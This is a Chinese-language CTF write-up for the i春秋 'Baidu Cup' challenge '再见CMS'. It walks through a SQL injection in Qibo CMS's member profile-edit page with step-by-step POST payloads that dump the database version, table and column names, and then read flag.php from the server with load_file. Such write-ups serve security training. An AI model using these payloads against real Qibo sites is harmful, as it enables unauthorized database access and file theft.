i春秋CTF-“百度杯”CTF比赛 九月场-再见CMS

1 信息收集

拿到CMS搭的站, 首先需要确定网站使用的是何种CMS,百度得到该CMS为齐博CMS的整站系统:http://v7.qibosoft.com/

image

接下来,收集信息,该CMS出现过哪些漏洞:

齐博整站/地方门户SQL注入漏洞

2 漏洞利用

简而言之,治理在修改信息时,有一个SQL注入漏洞。

接下来,我根据大佬的描述,写payload,利用这个漏洞:

0- 注册用户,记一下uid和email

1-报错测试:

url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
# email 为注册时的email
POST:
truename=xxxx%0000&Limitword[000][email protected]&provinceid=
image

2-加上注入语句

url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
POST data:
truename=xxxx%0000&Limitword[000][email protected]&provinceid= , address=(select version()) where uid = 3 %23 
image

3-查表:

POSTdata:
truename=xxxx%0000&Limitword[000][email protected]&provinceid= , address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid = 3 %23 
image

4-查列名

POSTdata:
truename=xxxx%0000&Limitword[000][email protected]&provinceid= 
, address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23 
image

但是没有直接的flag,只能考虑利用load_file

5-payload

扫描一下发现,网站更目录下,有一个flag.php

image

load_file函数读取这个文件:/var/www/html/flag.php

truename=xxxx%0000&Limitword[000][email protected]&provinceid= 
, address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23 
image

你可能感兴趣的:(i春秋CTF-“百度杯”CTF比赛 九月场-再见CMS)